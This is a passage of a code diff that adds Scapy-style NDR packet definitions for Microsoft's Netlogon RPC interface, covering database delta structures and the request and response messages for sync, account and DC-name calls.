NDRByteField("PasswordExpired", 0), + NDRPacketField("UserComment", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("Parameters", UNICODE_STRING(), UNICODE_STRING), + NDRShortField("CountryCode", 0), + NDRShortField("CodePage", 0), + NDRPacketField("PrivateData", NLPR_USER_PRIVATE_INFO(), NLPR_USER_PRIVATE_INFO), + NDRIntField("SecurityInformation", 0), + NDRIntField("SecuritySize", None, size_of="SecurityDescriptor"), + NDRFullEmbPointerField( + NDRConfStrLenField( + "SecurityDescriptor", "", size_is=lambda pkt: pkt.SecuritySize + ) + ), + NDRPacketField("ProfilePath", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString2", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString3", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString4", UNICODE_STRING(), UNICODE_STRING), + NDRIntField("DummyLong1", 0), + NDRIntField("DummyLong2", 0), + NDRIntField("DummyLong3", 0), + NDRIntField("DummyLong4", 0), + ] + + +class PNETLOGON_DELTA_RENAME_USER(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRPacketField("OldName", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("NewName", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString1", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString2", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString3", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString4", UNICODE_STRING(), UNICODE_STRING), + NDRIntField("DummyLong1", 0), + NDRIntField("DummyLong2", 0), + NDRIntField("DummyLong3", 0), + NDRIntField("DummyLong4", 0), + ] + + +class PNETLOGON_DELTA_GROUP_MEMBER(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRFullEmbPointerField( + NDRConfFieldListField( + "Members", [], NDRIntField("", 0), size_is=lambda pkt: pkt.MemberCount + ) + ), + NDRFullEmbPointerField( + NDRConfFieldListField( + "Attributes", + [], + NDRIntField("", 0), + size_is=lambda pkt: pkt.MemberCount, + ) + ), + NDRIntField("MemberCount", None, size_of="Attributes"), + NDRIntField("DummyLong1", 0), + NDRIntField("DummyLong2", 0), + NDRIntField("DummyLong3", 0), + NDRIntField("DummyLong4", 0), + ] + + +class PNETLOGON_DELTA_ALIAS(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRPacketField("Name", UNICODE_STRING(), UNICODE_STRING), + NDRIntField("RelativeId", 0), + NDRIntField("SecurityInformation", 0), + NDRIntField("SecuritySize", None, size_of="SecurityDescriptor"), + NDRFullEmbPointerField( + NDRConfStrLenField( + "SecurityDescriptor", "", size_is=lambda pkt: pkt.SecuritySize + ) + ), + NDRPacketField("Comment", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString2", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString3", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString4", UNICODE_STRING(), UNICODE_STRING), + NDRIntField("DummyLong1", 0), + NDRIntField("DummyLong2", 0), + NDRIntField("DummyLong3", 0), + NDRIntField("DummyLong4", 0), + ] + + +class PNETLOGON_DELTA_RENAME_ALIAS(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRPacketField("OldName", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("NewName", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString1", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString2", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString3", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString4", UNICODE_STRING(), UNICODE_STRING), + NDRIntField("DummyLong1", 0), + NDRIntField("DummyLong2", 0), + NDRIntField("DummyLong3", 0), + NDRIntField("DummyLong4", 0), + ] + + +class PNLPR_SID_INFORMATION(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRFullEmbPointerField(NDRPacketField("SidPointer", PRPC_SID(), PRPC_SID)) + ] + + +class NLPR_SID_ARRAY(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRIntField("Count", None, size_of="Sids"), + NDRFullEmbPointerField( + NDRConfPacketListField( + "Sids", [], PNLPR_SID_INFORMATION, size_is=lambda pkt: pkt.Count + ) + ), + ] + + +class PNETLOGON_DELTA_ALIAS_MEMBER(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRPacketField("Members", NLPR_SID_ARRAY(), NLPR_SID_ARRAY), + NDRIntField("DummyLong1", 0), + NDRIntField("DummyLong2", 0), + NDRIntField("DummyLong3", 0), + NDRIntField("DummyLong4", 0), + ] + + +class NLPR_QUOTA_LIMITS(NDRPacket): + ALIGNMENT = (4, 4) + fields_desc = [ + NDRIntField("PagedPoolLimit", 0), + NDRIntField("NonPagedPoolLimit", 0), + NDRIntField("MinimumWorkingSetSize", 0), + NDRIntField("MaximumWorkingSetSize", 0), + NDRIntField("PagefileLimit", 0), + NDRPacketField("Reserved", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + ] + + +class PNETLOGON_DELTA_POLICY(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRIntField("MaximumLogSize", 0), + NDRPacketField("AuditRetentionPeriod", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRByteField("AuditingMode", 0), + NDRIntField( + "MaximumAuditEventCount", + None, + size_of="EventAuditingOptions", + adjust=lambda _, x: (x - 1), + ), + NDRFullEmbPointerField( + NDRConfFieldListField( + "EventAuditingOptions", + [], + NDRIntField("", 0), + size_is=lambda pkt: (pkt.MaximumAuditEventCount + 1), + ) + ), + NDRPacketField("PrimaryDomainName", UNICODE_STRING(), UNICODE_STRING), + NDRFullEmbPointerField( + NDRPacketField("PrimaryDomainSid", PRPC_SID(), PRPC_SID) + ), + NDRPacketField("QuotaLimits", NLPR_QUOTA_LIMITS(), NLPR_QUOTA_LIMITS), + NDRPacketField("ModifiedId", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRPacketField("DatabaseCreationTime", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRIntField("SecurityInformation", 0), + NDRIntField("SecuritySize", None, size_of="SecurityDescriptor"), + NDRFullEmbPointerField( + NDRConfStrLenField( + "SecurityDescriptor", "", size_is=lambda pkt: pkt.SecuritySize + ) + ), + NDRPacketField("DummyString1", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString2", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString3", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString4", UNICODE_STRING(), UNICODE_STRING), + NDRIntField("DummyLong1", 0), + NDRIntField("DummyLong2", 0), + NDRIntField("DummyLong3", 0), + NDRIntField("DummyLong4", 0), + ] + + +class PUNICODE_STRING(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRShortField("Length", None, size_of="Buffer", adjust=lambda _, x: (x * 2)), + NDRShortField( + "MaximumLength", None, size_of="Buffer", adjust=lambda _, x: (x * 2) + ), + NDRFullEmbPointerField( + NDRConfVarStrLenFieldUtf16( + "Buffer", + "", + size_is=lambda pkt: (pkt.MaximumLength // 2), + length_is=lambda pkt: (pkt.Length // 2), + ) + ), + ] + + +class PNETLOGON_DELTA_TRUSTED_DOMAINS(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRPacketField("DomainName", UNICODE_STRING(), UNICODE_STRING), + NDRIntField("NumControllerEntries", None, size_of="ControllerNames"), + NDRFullEmbPointerField( + NDRConfPacketListField( + "ControllerNames", + [], + PUNICODE_STRING, + size_is=lambda pkt: pkt.NumControllerEntries, + ) + ), + NDRIntField("SecurityInformation", 0), + NDRIntField("SecuritySize", None, size_of="SecurityDescriptor"), + NDRFullEmbPointerField( + NDRConfStrLenField( + "SecurityDescriptor", "", size_is=lambda pkt: pkt.SecuritySize + ) + ), + NDRPacketField("DummyString1", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString2", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString3", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString4", UNICODE_STRING(), UNICODE_STRING), + NDRIntField("TrustedPosixOffset", 0), + NDRIntField("DummyLong2", 0), + NDRIntField("DummyLong3", 0), + NDRIntField("DummyLong4", 0), + ] + + +class PNETLOGON_DELTA_ACCOUNTS(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRIntField("PrivilegeEntries", None, size_of="PrivilegeNames"), + NDRIntField("PrivilegeControl", 0), + NDRFullEmbPointerField( + NDRConfFieldListField( + "PrivilegeAttributes", + [], + NDRIntField("", 0), + size_is=lambda pkt: pkt.PrivilegeEntries, + ) + ), + NDRFullEmbPointerField( + NDRConfPacketListField( + "PrivilegeNames", + [], + PUNICODE_STRING, + size_is=lambda pkt: pkt.PrivilegeEntries, + ) + ), + NDRPacketField("QuotaLimits", NLPR_QUOTA_LIMITS(), NLPR_QUOTA_LIMITS), + NDRIntField("SystemAccessFlags", 0), + NDRIntField("SecurityInformation", 0), + NDRIntField("SecuritySize", None, size_of="SecurityDescriptor"), + NDRFullEmbPointerField( + NDRConfStrLenField( + "SecurityDescriptor", "", size_is=lambda pkt: pkt.SecuritySize + ) + ), + NDRPacketField("DummyString1", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString2", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString3", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString4", UNICODE_STRING(), UNICODE_STRING), + NDRIntField("DummyLong1", 0), + NDRIntField("DummyLong2", 0), + NDRIntField("DummyLong3", 0), + NDRIntField("DummyLong4", 0), + ] + + +class NLPR_CR_CIPHER_VALUE(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRIntField("Length", None, size_of="Buffer"), + NDRIntField("MaximumLength", None, size_of="Buffer"), + NDRFullEmbPointerField( + NDRConfVarStrLenField( + "Buffer", + "", + size_is=lambda pkt: pkt.MaximumLength, + length_is=lambda pkt: pkt.Length, + ) + ), + ] + + +class PNETLOGON_DELTA_SECRET(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRPacketField("CurrentValue", NLPR_CR_CIPHER_VALUE(), NLPR_CR_CIPHER_VALUE), + NDRPacketField("CurrentValueSetTime", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRPacketField("OldValue", NLPR_CR_CIPHER_VALUE(), NLPR_CR_CIPHER_VALUE), + NDRPacketField("OldValueSetTime", OLD_LARGE_INTEGER(), OLD_LARGE_INTEGER), + NDRIntField("SecurityInformation", 0), + NDRIntField("SecuritySize", None, size_of="SecurityDescriptor"), + NDRFullEmbPointerField( + NDRConfStrLenField( + "SecurityDescriptor", "", size_is=lambda pkt: pkt.SecuritySize + ) + ), + NDRPacketField("DummyString1", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString2", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString3", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString4", UNICODE_STRING(), UNICODE_STRING), + NDRIntField("DummyLong1", 0), + NDRIntField("DummyLong2", 0), + NDRIntField("DummyLong3", 0), + NDRIntField("DummyLong4", 0), + ] + + +class PNETLOGON_DELTA_DELETE_GROUP(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRFullEmbPointerField(NDRConfVarStrNullFieldUtf16("AccountName", "")), + NDRPacketField("DummyString1", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString2", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString3", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString4", UNICODE_STRING(), UNICODE_STRING), + NDRIntField("DummyLong1", 0), + NDRIntField("DummyLong2", 0), + NDRIntField("DummyLong3", 0), + NDRIntField("DummyLong4", 0), + ] + + +class PNETLOGON_DELTA_DELETE_USER(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRFullEmbPointerField(NDRConfVarStrNullFieldUtf16("AccountName", "")), + NDRPacketField("DummyString1", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString2", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString3", UNICODE_STRING(), UNICODE_STRING), + NDRPacketField("DummyString4", UNICODE_STRING(), UNICODE_STRING), + NDRIntField("DummyLong1", 0), + NDRIntField("DummyLong2", 0), + NDRIntField("DummyLong3", 0), + NDRIntField("DummyLong4", 0), + ] + + +class PNETLOGON_DELTA_ENUM(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRInt3264EnumField("DeltaType", 0, NETLOGON_DELTA_TYPE), + NDRUnionField( + [ + ( + NDRIntField("DeltaID", 0), + ( + ( + lambda pkt: getattr(pkt, "DeltaType", None) + in [ + NETLOGON_DELTA_TYPE.AddOrChangeDomain, + NETLOGON_DELTA_TYPE.AddOrChangeGroup, + NETLOGON_DELTA_TYPE.DeleteGroup, + NETLOGON_DELTA_TYPE.RenameGroup, + NETLOGON_DELTA_TYPE.AddOrChangeUser, + NETLOGON_DELTA_TYPE.DeleteUser, + NETLOGON_DELTA_TYPE.RenameUser, + NETLOGON_DELTA_TYPE.ChangeGroupMembership, + NETLOGON_DELTA_TYPE.AddOrChangeAlias, + NETLOGON_DELTA_TYPE.DeleteAlias, + NETLOGON_DELTA_TYPE.RenameAlias, + NETLOGON_DELTA_TYPE.ChangeAliasMembership, + NETLOGON_DELTA_TYPE.DeleteGroupByName, + NETLOGON_DELTA_TYPE.DeleteUserByName, + ] + ), + ( + lambda _, val: val.tag + in [ + NETLOGON_DELTA_TYPE.AddOrChangeDomain, + NETLOGON_DELTA_TYPE.AddOrChangeGroup, + NETLOGON_DELTA_TYPE.DeleteGroup, + NETLOGON_DELTA_TYPE.RenameGroup, + NETLOGON_DELTA_TYPE.AddOrChangeUser, + NETLOGON_DELTA_TYPE.DeleteUser, + NETLOGON_DELTA_TYPE.RenameUser, + NETLOGON_DELTA_TYPE.ChangeGroupMembership, + NETLOGON_DELTA_TYPE.AddOrChangeAlias, + NETLOGON_DELTA_TYPE.DeleteAlias, + NETLOGON_DELTA_TYPE.RenameAlias, + NETLOGON_DELTA_TYPE.ChangeAliasMembership, + NETLOGON_DELTA_TYPE.DeleteGroupByName, + NETLOGON_DELTA_TYPE.DeleteUserByName, + ] + ), + ), + ), + ( + NDRFullEmbPointerField( + NDRPacketField("DeltaID", PRPC_SID(), PRPC_SID) + ), + ( + ( + lambda pkt: getattr(pkt, "DeltaType", None) + in [ + NETLOGON_DELTA_TYPE.AddOrChangeLsaPolicy, + NETLOGON_DELTA_TYPE.AddOrChangeLsaTDomain, + NETLOGON_DELTA_TYPE.DeleteLsaTDomain, + NETLOGON_DELTA_TYPE.AddOrChangeLsaAccount, + NETLOGON_DELTA_TYPE.DeleteLsaAccount, + ] + ), + ( + lambda _, val: val.tag + in [ + NETLOGON_DELTA_TYPE.AddOrChangeLsaPolicy, + NETLOGON_DELTA_TYPE.AddOrChangeLsaTDomain, + NETLOGON_DELTA_TYPE.DeleteLsaTDomain, + NETLOGON_DELTA_TYPE.AddOrChangeLsaAccount, + NETLOGON_DELTA_TYPE.DeleteLsaAccount, + ] + ), + ), + ), + ( + NDRFullEmbPointerField(NDRConfVarStrNullFieldUtf16("DeltaID", "")), + ( + ( + lambda pkt: getattr(pkt, "DeltaType", None) + in [ + NETLOGON_DELTA_TYPE.AddOrChangeLsaSecret, + NETLOGON_DELTA_TYPE.DeleteLsaSecret, + ] + ), + ( + lambda _, val: val.tag + in [ + NETLOGON_DELTA_TYPE.AddOrChangeLsaSecret, + NETLOGON_DELTA_TYPE.DeleteLsaSecret, + ] + ), + ), + ), + ], + StrFixedLenField("DeltaID", "", length=0), + align=(2, 8), + switch_fmt=("H", "I"), + ), + NDRUnionField( + [ + ( + NDRFullEmbPointerField( + NDRPacketField( + "DeltaUnion", + PNETLOGON_DELTA_DOMAIN(), + PNETLOGON_DELTA_DOMAIN, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "DeltaType", None) + == NETLOGON_DELTA_TYPE.AddOrChangeDomain + ), + ( + lambda _, val: val.tag + == NETLOGON_DELTA_TYPE.AddOrChangeDomain + ), + ), + ), + ( + NDRFullEmbPointerField( + NDRPacketField( + "DeltaUnion", PNETLOGON_DELTA_GROUP(), PNETLOGON_DELTA_GROUP + ) + ), + ( + ( + lambda pkt: getattr(pkt, "DeltaType", None) + == NETLOGON_DELTA_TYPE.AddOrChangeGroup + ), + ( + lambda _, val: val.tag + == NETLOGON_DELTA_TYPE.AddOrChangeGroup + ), + ), + ), + ( + NDRFullEmbPointerField( + NDRPacketField( + "DeltaUnion", + PNETLOGON_DELTA_RENAME_GROUP(), + PNETLOGON_DELTA_RENAME_GROUP, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "DeltaType", None) + == NETLOGON_DELTA_TYPE.RenameGroup + ), + (lambda _, val: val.tag == NETLOGON_DELTA_TYPE.RenameGroup), + ), + ), + ( + NDRFullEmbPointerField( + NDRPacketField( + "DeltaUnion", PNETLOGON_DELTA_USER(), PNETLOGON_DELTA_USER + ) + ), + ( + ( + lambda pkt: getattr(pkt, "DeltaType", None) + == NETLOGON_DELTA_TYPE.AddOrChangeUser + ), + (lambda _, val: val.tag == NETLOGON_DELTA_TYPE.AddOrChangeUser), + ), + ), + ( + NDRFullEmbPointerField( + NDRPacketField( + "DeltaUnion", + PNETLOGON_DELTA_RENAME_USER(), + PNETLOGON_DELTA_RENAME_USER, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "DeltaType", None) + == NETLOGON_DELTA_TYPE.RenameUser + ), + (lambda _, val: val.tag == NETLOGON_DELTA_TYPE.RenameUser), + ), + ), + ( + NDRFullEmbPointerField( + NDRPacketField( + "DeltaUnion", + PNETLOGON_DELTA_GROUP_MEMBER(), + PNETLOGON_DELTA_GROUP_MEMBER, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "DeltaType", None) + == NETLOGON_DELTA_TYPE.ChangeGroupMembership + ), + ( + lambda _, val: val.tag + == NETLOGON_DELTA_TYPE.ChangeGroupMembership + ), + ), + ), + ( + NDRFullEmbPointerField( + NDRPacketField( + "DeltaUnion", PNETLOGON_DELTA_ALIAS(), PNETLOGON_DELTA_ALIAS + ) + ), + ( + ( + lambda pkt: getattr(pkt, "DeltaType", None) + == NETLOGON_DELTA_TYPE.AddOrChangeAlias + ), + ( + lambda _, val: val.tag + == NETLOGON_DELTA_TYPE.AddOrChangeAlias + ), + ), + ), + ( + NDRFullEmbPointerField( + NDRPacketField( + "DeltaUnion", + PNETLOGON_DELTA_RENAME_ALIAS(), + PNETLOGON_DELTA_RENAME_ALIAS, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "DeltaType", None) + == NETLOGON_DELTA_TYPE.RenameAlias + ), + (lambda _, val: val.tag == NETLOGON_DELTA_TYPE.RenameAlias), + ), + ), + ( + NDRFullEmbPointerField( + NDRPacketField( + "DeltaUnion", + PNETLOGON_DELTA_ALIAS_MEMBER(), + PNETLOGON_DELTA_ALIAS_MEMBER, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "DeltaType", None) + == NETLOGON_DELTA_TYPE.ChangeAliasMembership + ), + ( + lambda _, val: val.tag + == NETLOGON_DELTA_TYPE.ChangeAliasMembership + ), + ), + ), + ( + NDRFullEmbPointerField( + NDRPacketField( + "DeltaUnion", + PNETLOGON_DELTA_POLICY(), + PNETLOGON_DELTA_POLICY, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "DeltaType", None) + == NETLOGON_DELTA_TYPE.AddOrChangeLsaPolicy + ), + ( + lambda _, val: val.tag + == NETLOGON_DELTA_TYPE.AddOrChangeLsaPolicy + ), + ), + ), + ( + NDRFullEmbPointerField( + NDRPacketField( + "DeltaUnion", + PNETLOGON_DELTA_TRUSTED_DOMAINS(), + PNETLOGON_DELTA_TRUSTED_DOMAINS, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "DeltaType", None) + == NETLOGON_DELTA_TYPE.AddOrChangeLsaTDomain + ), + ( + lambda _, val: val.tag + == NETLOGON_DELTA_TYPE.AddOrChangeLsaTDomain + ), + ), + ), + ( + NDRFullEmbPointerField( + NDRPacketField( + "DeltaUnion", + PNETLOGON_DELTA_ACCOUNTS(), + PNETLOGON_DELTA_ACCOUNTS, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "DeltaType", None) + == NETLOGON_DELTA_TYPE.AddOrChangeLsaAccount + ), + ( + lambda _, val: val.tag + == NETLOGON_DELTA_TYPE.AddOrChangeLsaAccount + ), + ), + ), + ( + NDRFullEmbPointerField( + NDRPacketField( + "DeltaUnion", + PNETLOGON_DELTA_SECRET(), + PNETLOGON_DELTA_SECRET, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "DeltaType", None) + == NETLOGON_DELTA_TYPE.AddOrChangeLsaSecret + ), + ( + lambda _, val: val.tag + == NETLOGON_DELTA_TYPE.AddOrChangeLsaSecret + ), + ), + ), + ( + NDRFullEmbPointerField( + NDRPacketField( + "DeltaUnion", + PNETLOGON_DELTA_DELETE_GROUP(), + PNETLOGON_DELTA_DELETE_GROUP, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "DeltaType", None) + == NETLOGON_DELTA_TYPE.DeleteGroupByName + ), + ( + lambda _, val: val.tag + == NETLOGON_DELTA_TYPE.DeleteGroupByName + ), + ), + ), + ( + NDRFullEmbPointerField( + NDRPacketField( + "DeltaUnion", + PNETLOGON_DELTA_DELETE_USER(), + PNETLOGON_DELTA_DELETE_USER, + ) + ), + ( + ( + lambda pkt: getattr(pkt, "DeltaType", None) + == NETLOGON_DELTA_TYPE.DeleteUserByName + ), + ( + lambda _, val: val.tag + == NETLOGON_DELTA_TYPE.DeleteUserByName + ), + ), + ), + ( + NDRFullEmbPointerField( + NDRPacketField( + "DeltaUnion", PNLPR_MODIFIED_COUNT(), PNLPR_MODIFIED_COUNT + ) + ), + ( + ( + lambda pkt: getattr(pkt, "DeltaType", None) + == NETLOGON_DELTA_TYPE.SerialNumberSkip + ), + ( + lambda _, val: val.tag + == NETLOGON_DELTA_TYPE.SerialNumberSkip + ), + ), + ), + ], + StrFixedLenField("DeltaUnion", "", length=0), + align=(2, 8), + switch_fmt=("H", "I"), + ), + ] + + +class PNETLOGON_DELTA_ENUM_ARRAY(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRIntField("CountReturned", None, size_of="Deltas"), + NDRFullEmbPointerField( + NDRConfPacketListField( + "Deltas", + [], + PNETLOGON_DELTA_ENUM, + size_is=lambda pkt: pkt.CountReturned, + ) + ), + ] + + +class NetrDatabaseDeltas_Request(NDRPacket): + fields_desc = [ + NDRConfVarStrNullFieldUtf16("PrimaryName", ""), + NDRConfVarStrNullFieldUtf16("ComputerName", ""), + NDRPacketField( + "Authenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRPacketField( + "ReturnAuthenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRIntField("DatabaseID", 0), + NDRPacketField( + "DomainModifiedCount", PNLPR_MODIFIED_COUNT(), PNLPR_MODIFIED_COUNT + ), + NDRIntField("PreferredMaximumLength", 0), + ] + + +class NetrDatabaseDeltas_Response(NDRPacket): + fields_desc = [ + NDRPacketField( + "ReturnAuthenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRPacketField( + "DomainModifiedCount", PNLPR_MODIFIED_COUNT(), PNLPR_MODIFIED_COUNT + ), + NDRFullPointerField( + NDRPacketField( + "DeltaArray", PNETLOGON_DELTA_ENUM_ARRAY(), PNETLOGON_DELTA_ENUM_ARRAY + ) + ), + NDRIntField("status", 0), + ] + + +class NetrDatabaseSync_Request(NDRPacket): + fields_desc = [ + NDRConfVarStrNullFieldUtf16("PrimaryName", ""), + NDRConfVarStrNullFieldUtf16("ComputerName", ""), + NDRPacketField( + "Authenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRPacketField( + "ReturnAuthenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRIntField("DatabaseID", 0), + NDRIntField("SyncContext", 0), + NDRIntField("PreferredMaximumLength", 0), + ] + + +class NetrDatabaseSync_Response(NDRPacket): + fields_desc = [ + NDRPacketField( + "ReturnAuthenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRIntField("SyncContext", 0), + NDRFullPointerField( + NDRPacketField( + "DeltaArray", PNETLOGON_DELTA_ENUM_ARRAY(), PNETLOGON_DELTA_ENUM_ARRAY + ) + ), + NDRIntField("status", 0), + ] + + +class PUAS_INFO_0(NDRPacket): + ALIGNMENT = (4, 4) + fields_desc = [ + StrFixedLenField("ComputerName", "", length=16), + NDRIntField("TimeCreated", 0), + NDRIntField("SerialNumber", 0), + ] + + +class NetrAccountDeltas_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("PrimaryName", "")), + NDRConfVarStrNullFieldUtf16("ComputerName", ""), + NDRPacketField( + "Authenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRPacketField( + "ReturnAuthenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRPacketField("RecordId", PUAS_INFO_0(), PUAS_INFO_0), + NDRIntField("Count", 0), + NDRIntField("Level", 0), + NDRIntField("BufferSize", 0), + ] + + +class NetrAccountDeltas_Response(NDRPacket): + fields_desc = [ + NDRPacketField( + "ReturnAuthenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRConfStrLenField("Buffer", "", size_is=lambda pkt: pkt.BufferSize), + NDRIntField("CountReturned", 0), + NDRIntField("TotalEntries", 0), + NDRPacketField("NextRecordId", PUAS_INFO_0(), PUAS_INFO_0), + NDRIntField("status", 0), + ] + + +class NetrAccountSync_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("PrimaryName", "")), + NDRConfVarStrNullFieldUtf16("ComputerName", ""), + NDRPacketField( + "Authenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRPacketField( + "ReturnAuthenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRIntField("Reference", 0), + NDRIntField("Level", 0), + NDRIntField("BufferSize", 0), + ] + + +class NetrAccountSync_Response(NDRPacket): + fields_desc = [ + NDRPacketField( + "ReturnAuthenticator", PNETLOGON_AUTHENTICATOR(), PNETLOGON_AUTHENTICATOR + ), + NDRConfStrLenField("Buffer", "", size_is=lambda pkt: pkt.BufferSize), + NDRIntField("CountReturned", 0), + NDRIntField("TotalEntries", 0), + NDRIntField("NextReference", 0), + NDRPacketField("LastRecordId", PUAS_INFO_0(), PUAS_INFO_0), + NDRIntField("status", 0), + ] + + +class NetrGetDCName_Request(NDRPacket): + fields_desc = [ + NDRConfVarStrNullFieldUtf16("ServerName", ""), + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("DomainName", "")), + ] + + +class NetrGetDCName_Response(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("Buffer", "")), + NDRIntField("status", 0), + ] + + +class PNETLOGON_INFO_1(NDRPacket): + ALIGNMENT = (4, 4) + fields_desc = [ + NDRIntField("netlog1_flags", 0), + NDRIntField("netlog1_pdc_connection_status", 0), + ] + + +class PNETLOGON_INFO_2(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRIntField("netlog2_flags", 0), + NDRIntField("netlog2_pdc_connection_status", 0), + NDRFullEmbPointerField( + NDRConfVarStrNullFieldUtf16("netlog2_trusted_dc_name", "") + ), + NDRIntField("netlog2_tc_connection_status", 0), + ] + + +class PNETLOGON_INFO_3(NDRPacket): + ALIGNMENT = (4, 4) + fields_desc = [ + NDRIntField("netlog3_flags", 0), + NDRIntField("netlog3_logon_attempts", 0), + NDRIntField("netlog3_reserved1", 0), + NDRIntField("netlog3_reserved2", 0), + NDRIntField("netlog3_reserved3", 0), + NDRIntField("netlog3_reserved4", 0), + NDRIntField("netlog3_reserved5", 0), + ] + + +class PNETLOGON_INFO_4(NDRPacket): + ALIGNMENT = (4, 8) + fields_desc = [ + NDRFullEmbPointerField( + NDRConfVarStrNullFieldUtf16("netlog4_trusted_dc_name", "") + ), + NDRFullEmbPointerField( + NDRConfVarStrNullFieldUtf16("netlog4_trusted_domain_name", "") + ), + ] + + +class NetrLogonControl_Request(NDRPacket): + fields_desc = [ + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("ServerName", "")), + NDRIntField("FunctionCode", 0), + NDRIntField("QueryLevel", 0), + ] + + +class NetrLogonControl_Response(NDRPacket): + fields_desc = [ + NDRUnionField( + [ + ( + NDRFullPointerField( + NDRPacketField("Buffer", PNETLOGON_INFO_1(), PNETLOGON_INFO_1) + ), + ( + (lambda pkt: getattr(pkt, "QueryLevel", None) == 1), + (lambda _, val: val.tag == 1), + ), + ), + ( + NDRFullPointerField( + NDRPacketField("Buffer", PNETLOGON_INFO_2(), PNETLOGON_INFO_2) + ), + ( + (lambda pkt: getattr(pkt, "QueryLevel", None) == 2), + (lambda _, val: val.tag == 2), + ), + ), + ( + NDRFullPointerField( + NDRPacketField("Buffer", PNETLOGON_INFO_3(), PNETLOGON_INFO_3) + ), + ( + 